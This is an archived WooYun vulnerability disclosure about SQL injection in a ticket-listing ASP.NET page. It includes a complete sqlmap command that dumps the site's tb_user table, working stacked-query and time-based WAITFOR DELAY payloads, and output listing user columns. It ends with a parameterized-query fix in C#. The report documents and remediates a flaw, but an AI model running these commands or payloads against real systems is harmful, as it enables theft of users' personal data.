WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2013-12-20: Details reported to the vendor, awaiting vendor response
2013-12-24: Vendor confirmed; details disclosed to the vendor only
2014-01-03: Details disclosed to core white hats and relevant domain experts
2014-01-13: Details disclosed to regular white hats
2014-01-23: Details disclosed to intern white hats
2014-02-03: Details disclosed to the public

A simple scan found a SQL Server injection that leaks user information.
python sqlmap.py -u "25555555.com/menpiao/menpiao/MenPiaoList.aspx?key=xx&type=1" --dump -D kuaida -T tb_user --threads 10 --batch --dbms mssql
[15:18:19] [INFO] testing connection to the target URL
[15:18:20] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: type
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: key=xx&type=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: key=xx&type=1 WAITFOR DELAY '0:0:5'--
---
[15:18:20] [INFO] testing Microsoft SQL Server
[15:18:20] [INFO] confirming Microsoft SQL Server
[15:18:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[15:18:20] [INFO] fetching columns for table 'tb_user' in database 'kuaida'
[15:18:20] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[15:18:20] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
sqlmap got a 302 redirect to 'http://25555555.com:80/menpiao/500.htm'. Do you want to follow? [Y/n] Y
[15:18:36] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
14
[15:18:50] [INFO] retrieved:
[15:18:55] [INFO] adjusting time delay to 3 seconds due to good response times
address
[15:20:55] [INFO] retrieved: b
[15:21:23] [ERROR] invalid character detected. retrying..
[15:21:23] [WARNING] increasing time delay to 4 seconds
irthday
[15:23:31] [INFO] retrieved: classId
[15:25:28] [INFO] retrieved: email
[15:26:49] [INFO] retrieved: fax
Fix: filter the parameters (the `type` parameter reaches SQL Server unvalidated, which is what allows the stacked and time-based queries above).
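Added example, not the vendor's code: how the MenPiaoList.aspx handler should pass `key` and `type` to SQL Server so that the stacked-query and time-based payloads shown above become plain data. Only the two parameter names come from the report; the connection string, table and column names are placeholders.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web;

public static class MenPiaoQuery
{
    // Vulnerable pattern (do not use): concatenating the query string into SQL text lets
    // "type=1; WAITFOR DELAY '0:0:5'--" execute as a second, attacker-chosen statement.
    //   string sql = "SELECT ... FROM Tickets WHERE Name LIKE '%" + key + "%' AND Type = " + type;

    public static DataTable ListTickets(string connString, HttpRequest request)
    {
        // "type" is an integer in the application, so reject anything that is not one
        // before it goes anywhere near the database.
        int ticketType;
        if (!int.TryParse(request.QueryString["type"], out ticketType))
            throw new HttpException(400, "invalid type");

        // Free-text search term: bound the length, then bind it as a parameter.
        string key = request.QueryString["key"] ?? string.Empty;
        if (key.Length > 64)
            throw new HttpException(400, "key too long");

        // Placeholder table/columns; the SQL text is constant and contains no user input.
        const string sql =
            "SELECT Id, Name, Price FROM Tickets WHERE Name LIKE @pattern AND Type = @type";

        using (var conn = new SqlConnection(connString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 70).Value = "%" + EscapeLike(key) + "%";
            cmd.Parameters.Add("@type", SqlDbType.Int).Value = ticketType;

            var table = new DataTable();
            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
                table.Load(reader);
            return table;
        }
    }

    // Even as a bound parameter, LIKE wildcards in user input act as pattern syntax;
    // SQL Server escapes them with [ ] so the search term is matched literally.
    private static string EscapeLike(string s)
    {
        return s.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }
}
```

The database login used by the page should also be limited to SELECT on the ticket tables, so that even a future injection cannot read `tb_user`.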
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2013-12-24 21:53
None yet